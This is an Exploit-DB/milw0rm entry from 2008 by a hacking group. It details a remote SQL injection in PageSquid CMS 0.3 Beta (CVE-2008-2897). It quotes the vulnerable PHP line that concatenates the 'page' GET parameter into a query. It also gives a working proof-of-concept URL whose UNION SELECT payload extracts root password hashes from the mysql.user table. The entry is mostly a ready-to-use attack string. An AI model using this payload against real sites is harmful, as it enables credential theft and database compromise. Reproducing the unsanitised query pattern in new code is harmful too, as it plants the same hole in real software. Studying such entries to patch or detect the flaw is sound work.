PageSquid CMS 0.3 Beta - 'index.php' SQL Injection
Author: CWH Underground
type: webapps
platform: php
port:
date_added: 2008-06-21
date_updated: 2016-12-09
verified: 1
codes: OSVDB-46819;CVE-2008-2897
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comPageSquid_0.3_beta.zip
=====================================================================
PageSquid CMS (index.php page) Remote SQL Injection Vulnerability
=====================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 22 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : PageSquid CMS
VERSION : 0.3 Beta
DOWNLOAD : http://downloads.sourceforge.net/pagesquid
#####################################################
--- Remote SQL Injection Exploit ---
**Magic_quote must turn off**
-----------------------------------
Vulnerable File [index.php?page=]
-----------------------------------
@Line 5
4: if (isset($_GET['page'])) {
5: $result = mysql_fetch_array(mysql_query("SELECT * FROM pages WHERE page_id='" . $_GET['page'] . "'"));
6: } else {
7: $result = mysql_fetch_array(mysql_query("SELECT * FROM pages WHERE page_order='1'"));
8: }
---------
Exploit
---------
[+] http://[Target]/[pagesquid_path]/index.php?page=[SQL Injection]
-------------
POC Exploit
-------------
[+] http://192.168.24.25/pagesquid/index.php?page=3'/**/AND/**/1=2/**/UNION/**/SELECT/**/1,Password,3,4/**/FROM/**/mysql.user/**/WHERE/**/User='root
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-22]